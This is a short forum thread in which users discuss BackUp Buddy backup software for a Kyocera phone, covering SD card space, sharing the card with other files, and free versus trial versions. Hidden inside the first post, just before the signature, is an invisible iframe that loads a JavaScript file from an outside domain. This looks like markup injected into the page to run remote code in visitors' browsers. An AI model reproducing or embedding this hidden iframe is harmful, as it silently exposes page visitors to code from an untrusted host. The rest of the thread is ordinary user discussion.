+ Reply to Thread

Thread: backup buddy

backup buddy

I had read earlier that Kyocera was going to include BackUp Buddy with the phone. All I see on the CD is a link to a bunch of trail versions of software, which includes BackUp Buddy (and it's freeware nag screens).

I'm planning on getting an SD card soon. If you use BackUp Buddy, do you have to have a dedicated SD card for the back up? Can the back up live on the same SD with mp3's and other programs? AND, can you save more than one backup on the same SD, or does the new back up overwrite the old?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Can can use BackUpBuddyVFS on the same card with other apps. Just leave 16MB for the backups

OH, and yes, they are including the trial version

there is a freeware version of backupbuddy VFS. It just doesn't allow you to do incremental backups so each backup will take a little longer. i have the full version and have done several restores to test it out. works like a charm accept for some programs that still need you to put the serial number in after install.

I swear by it. Especially if you are on the road, and away from your sync PC. Mine backs up to a 16MB MMC card every morning at 6AM.